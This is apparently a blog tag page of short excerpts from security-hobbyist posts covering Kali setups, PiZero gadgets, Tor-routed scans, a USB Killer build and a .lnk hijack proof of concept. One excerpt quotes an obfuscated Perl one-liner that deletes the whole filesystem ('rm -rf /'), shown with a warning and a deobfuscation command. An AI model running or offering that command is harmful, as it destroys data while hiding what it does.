~/devreads

#hacking

33 posts

21 Apr 2022

10 Feb 2022

David Buckhurst 4 min read

Hackathons, innovation days, codefests — whatever you call them — have been a feature of the tech industry for the last 20 years, and one of the most powerful ideation tools at our disposal. The premise is simple: given a theme or problem space, the hackathon participants must self-organise into teams to explore ideas, write some code, and deliver a…

hackathons, hacking, innovation, bbc, software-development

14 Jul 2017

jgamblin 1 min read

Security summer camp is about a week away so I spent some time this afternoon trying to figure out what talks and events I want to make sure I attend. BSides Las Vegas: A Day in the Life of a Product Security Incident Response Manager; From SOC to CSIRT; Hadoop Safari: Hunting For Vulnerabilities; Introduction to Reversing and Pwning…

career, hacking, uncategorized

12 Jun 2017

jgamblin 1 min read

Often while doing research I need temporary access to a bunch of different virtual machines. While it is possible to do this on my MacBook using VMware Fusion or VirtualBox, the overhead seems unnecessary for something I will delete in under a week. My go-to solution is a virtualization stack of: 16GB DigitalOcean Droplet + Wok + Kimchi. Here is…

career, hacking

8 Mar 2017

jgamblin 1 min read

Certificate transparency logs are an amazing way to get a good overview of your certificate landscape, detect fraud (bad guys also use TLS) and find shadow IT and unknown cloud services. The problem is that there are not many good places to search these logs. The best I have found is from Symantec, although it is slow and errors out…

hacking

5 Mar 2017

jgamblin 1 min read

Ever since Charlie Miller hacked a Jeep while it was driving on the interstate I have wanted to learn more about Car Hacking but really had not had a chance to get started with it until a month ago when I ordered a Carloop and was ready to get hacking: … or so I thought. Turns out car hacking is…

hacking

20 Jan 2017

jgamblin 1 min read

I was lucky enough to get a hold of an Insta360 Nano this week and it is some of the most amazing technology I have seen recently. It allows for truly instant 360 photos, videos and timelapse captures. As one of the people I was showing it to this week said it is the “selfiestick of 2017”. Here are some…

hacking

6 Jan 2017

jgamblin 1 min read

Scanning a host with Nmap is a fairly routine act for some in security to do but from time to time you want to either get a different view of a host or try to conceal your public IP. In this case I use this simple “trick” to run an nmap scan through TOR. To do so you need…

hacking, security

30 Dec 2016

jgamblin 1 min read

Yesterday US-CERT released information on GRIZZLY STEPPE, the malware used in the DNC hack. The IP and hash information provided by US-CERT was really lacking so I decided to dig through it and see if I could make more of it. The first thing I did was to run the IPs through an ipinfo2sheets spreadsheet I put together earlier…

hacking, security

29 Dec 2016

jgamblin 1 min read

In November I saw this YouTube video on turning a USB Air Purifier into a $75 USB Killer: My soldering skills are basically nonexistent so while I had some time off around the holidays I decided this would be a decent project to help improve them. So in early December I ordered 3 of these from Amazon: USB ionic Oxygen…

hacking, security

22 Dec 2016

jgamblin 1 min read

I had a coach whose favorite quote was “Pain is the best teacher.” and that was the first thing that popped into my head this morning when I realized that I had left an $80 a month Digital Ocean Droplet running for an extra 3 weeks after I got done using it. To be honest $60 isn’t *that* painful but…

career, hacking, security

21 Dec 2016

jgamblin 1 min read

I am a huge fan of snow and hacky one-line Linux commands. Thanks to some amazing people on Twitter and a little too much free time at the end of the year they have both combined to bring snow to your terminal window just in time for your winter based holiday. This command works on OSX out of the…

hacking

20 Dec 2016

jgamblin 1 min read

What will 2017 hold for the security industry? I sat down and looked into my crystal ball and came up with these 8 security predictions for 2017. A Fortune 500 Will Use “DDOS as a Service” To Attack A Competitor. A bored VP of Marketing with a PayPal account, a six pack and a nephew who can get him on…

career, hacking, security

4 Dec 2016

jgamblin 1 min read

I have been playing with my stack of pizero a bunch lately and tonight I decided to put together a piZero OTG Ethernet gadget that runs Kali (Really KaToolin), XRDP and Mate in a computer on a stick configuration. This way I have a full (as I want it to be) Kali installation with me as long as I have…

career, hacking, security

30 Nov 2016

jgamblin 1 min read

I have been playing with my stack of piZeros recently and started to read about the kernel OTG gadgets and was intrigued by the OTG_HID gadget. So after doing some reading I found that someone had ported the USB Rubber Ducky platform to the piZero and called it rspiducky. Building it is fairly straightforward but if you…

career, hacking, security

28 Nov 2016

jgamblin 1 min read

I have been reading a lot about Beacon Frames on my vacation this week (stop laughing) and I came across a tool in Kali called MDK3 that will allow you to send fake beacon frames. I couldn’t pass up a chance to test this so I pulled out my trusty TL-WN722N and made a list of the 5,0000 most common…

hacking, security

26 Nov 2016

jgamblin 1 min read

Thanks to PoisonTap I have finally had a reason to pull my PiZero out of the ever growing “Stuff to Hack” pile and start working on it. I have a couple of neat ideas that are coming down the pipeline but this weekend I built a VPN sidecar using a USB OTG Gadget. I wanted to be able to use…

career, hacking, security

4 Nov 2016

jgamblin 1 min read

I am often asked “What is the easiest thing companies can do to secure their networks?” and my answer is always “Know what is on your network.” While that is simple advice it is a lot harder to implement. One company I was working with was looking at a system to do continuous network monitoring (read: scheduled nmap scans)…

career, hacking

20 Oct 2016

jgamblin 1 min read

I use DigitalOcean for a majority of my testing and from time to time I need a desktop environment to run some of my tools (like burp). After spending much more time than I want to admit I have it down to these 10 commands to bring an Ubuntu + Mate + XRDP desktop to an Ubuntu Droplet: sudo…

career, hacking

17 Oct 2016

jgamblin 1 min read

Earlier this week someone sent me this one line perl script (that you shouldn’t run): perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see' Due to some really clever code obfuscation it runs rm -rf /. You can deobfuscate (is that a word?) with this: perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"' While trying to figure out how this code works I stumbled upon…

career, hacking

5 Oct 2016

jgamblin 1 min read

Recently I have been working with some NGFW tools to automatically detect and block when someone is scraping, brute forcing or “load testing” your website. I quickly ran into a problem where none of the tools I use would allow me to quickly change user agents so I put together a couple of quick scripts that call one of 7500…

career, hacking

25 Aug 2016

jgamblin 1 min read

One of the first things I like to do when I start looking at a PCAP during an investigation is run it through snort to see if it finds anything suspicious. You can easily do this at the command line with snort -dv -r test.pcap but the output is not great. I have been using a tool called websnort for…

career, hacking, security

17 Aug 2016

jgamblin 1 min read

My friends at DigitalOcean were nice enough to give me a generous amount of credit on their cloud platform to do some security research with so I decided to do the most reckless thing I could think of and run a full ssh honeypot on the internet. The build out is pretty simple, it is the SSHoneypot Docker Container I…

hacking, security

25 Jul 2016

jgamblin 2 min read

I took some time tonight and read through the Security Summer Camp (BSidesLV, Blackhat and Defcon) schedules and picked the talks from this year that I think will be the best and that I do not want to miss. I ended up with these 16 talks I am going to make a special point to see next week: BSidesLV Managing…

career, hacking, security

15 Jul 2016

jgamblin 2 min read

We are two weeks away from Security Summer Camp (which is BSidesLV, Blackhat and Defcon)! So it is time for everyone to write their annual blog posts about what you must do before you head out. I want to be one of the cool kids so here is my list of 6 things to do before you pack: Delete All…

hacking, security

13 Jul 2016

jgamblin 1 min read

While doing security research it is not uncommon for me to build and destroy between 20 and 25 cloud servers a week on Digital Ocean. While there are great guides like “My First 10 Minutes On a Server – Primer for Securing Ubuntu” and “My First 5 Minutes On A Server; Or, Essential Security for Linux Servers”, I do not have…

hacking, security

10 Jul 2016

jgamblin 1 min read

There has been a lot of talk about why you should use a VPN on public networks and why it shouldn’t be a commercial one. I am a huge fan of the Streisand privacy stack because it includes an L2TP/IPsec VPN, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, and a Tor bridge all in one amazing package. The problem with Streisand…

career, hacking, security

6 Jul 2016

jgamblin 2 min read

One of the tips that security professionals love to give is to use a VPN on public wifi networks. This is great advice (I personally like PrivateInternetAccess and NordVPN). Recently I noticed nike.com blocks traffic from TOR and VPN providers. That got me wondering what other websites were blocking traffic from these sources so I decided to test the…

hacking

4 Jul 2016

jgamblin 1 min read

I had a 2014 Dell Chromebook 11 I was not doing anything with so I decided to turn it into a standalone Kali box using the Chromium OS Universal Chroot Environment. The installation steps are pretty simple: Add a l33t hacker sticker: Enable Developer Mode (this will wipe the device). Login and download the latest crouton. Access the terminal by…

hacking

23 Jun 2016

jgamblin 1 min read

A picture started floating around the internet of Mark Zuckerberg holding an Instagram cutout: People almost instantly started to notice that his webcam and mic were taped over. While Mark Zuckerberg isn’t exactly known for having great security practices, all his social media passwords were Dadada. This started a discussion in the office if someone could really spy on you…

career, hacking

20 Jun 2016

jgamblin 1 min read

While rebuilding my iPad this weekend I noticed that I could name it an emoji. So I named my iPad 📱 (U+1F4F1): While I don’t have any problem using the iPad it basically makes it unreachable on the network via hostname. From there I renamed all of my lab machines emojis. Mostly variations of 💩 (U+1F4A9) because I am sophomoric: In…

career, hacking

12 Jun 2016

jgamblin 1 min read

Earlier today I ran across this blog post on hijacking Windows .lnk files so I decided to build out and test a full POC for it using Windows 8.1. To reproduce this just copy these 7 lines into PowerShell and ctrl+c now runs calc.exe instead of copying your text: https://gist.github.com/jgamblin/4aa897a2cca6912eeea96a12d73d8cd6 For extra jerkiness this will shut down a Windows machine when…

hacking

27 Dec 2015

Henrik Warne 6 min read

I recently finished reading Ghost in the Wires by Kevin Mitnick. It is the story of Mitnick’s hacking career, from the start in his teens, through becoming the FBI’s most wanted hacker, to spending years in jail before finally being …

learning, work, hacking, security, social engineering